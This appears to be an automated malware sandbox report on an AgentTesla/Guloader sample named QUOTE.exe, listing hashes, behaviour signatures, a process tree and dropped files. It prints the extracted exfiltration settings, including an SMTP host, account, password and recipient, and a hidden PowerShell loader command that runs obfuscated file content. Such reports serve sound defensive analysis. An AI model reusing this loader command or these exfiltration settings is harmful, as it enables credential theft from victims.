Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
15/03/2024, 02:03
General
-
Target
QUOTE.exe
-
Size
346KB
-
MD5
70c8145c188bf89c25f085e001c6f9a7
-
SHA1
d3e24cdd7272965ba04b8a0a7013c79e2633f7aa
-
SHA256
4cb733e05325fdf02dfaf5982ca2a8917373658aed1e328869077e92c6d73225
-
SHA512
445f9f092241810359fcd7e319ec5f0dc40a4f19656484085a37201b5dd348a246bb1916b9ee526292cdab00068c5f2ddaacc259470c440d4bd82c6ad6cfa40c
-
SSDEEP
6144:5XCKG5Hob1T0qQzmnMpv+j++KqfUuuMSR7EDaLLt+a5YiCmbnIGZmXjeqJKnuG2a:5XcHy1gqOppGq+k1imLwauAZCjeqJKuE
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
sqjj uocs bicm tinm - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\QUOTE.exe"C:\Users\Admin\AppData\Local\Temp\QUOTE.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -windowstyle hidden "$Isocracy202=Get-Content 'C:\Users\Admin\AppData\Local\Temp\gyllepumper\kamgavls\jargonels\Infami\Metagaster\Brnehaveklasserne.Mom';$Alderdoms=$Isocracy202.SubString(54858,3);.$Alderdoms($Isocracy202)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3844 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
326KB
MD52348c28b6ff7851f7162d654f935091f
SHA18442a4fa957f48402c3e3c2edd240acc5d4613cd
SHA2566eb4bdccdb2c134c8083246c4dbfcb256f04e49b1689193422bc41b4b443164c
SHA51227c9b48638d3ef6a191bf2861ee7ac86b4960a8e5b701f7db2787087fbe58e1d927dfa7247be90f35db6a6d7568110c3175e11b36e113d08bb021a7ce70d8771
-
Filesize
53KB
MD52a4402450d6e37b4c5f6434e8e2548ae
SHA129b0d015b4c7420b576f3ce745b95f16f416045e
SHA25605e03c9da534face56a3181a98e7194ce73a4638f713523d26aa97486f427eea
SHA512e5a69a27041b0c1f8592861e820da036edc41cf3b0d630a6eea8e1cb8935ff88a5aec6a231e240c2c3fa52c47c64608ea84924cb6165170e3ee144335fbb4387
-
Filesize
64KB
-
Filesize
27.1MB
-
Filesize
408KB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
216KB
-
Filesize
6.5MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
27.1MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
27.1MB
-
Filesize
27.1MB
-
Filesize
7.7MB
-
Filesize
1.1MB
-
Filesize
18.3MB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
272KB
-
Filesize
27.1MB
-
Filesize
64KB
-
Filesize
27.1MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
320KB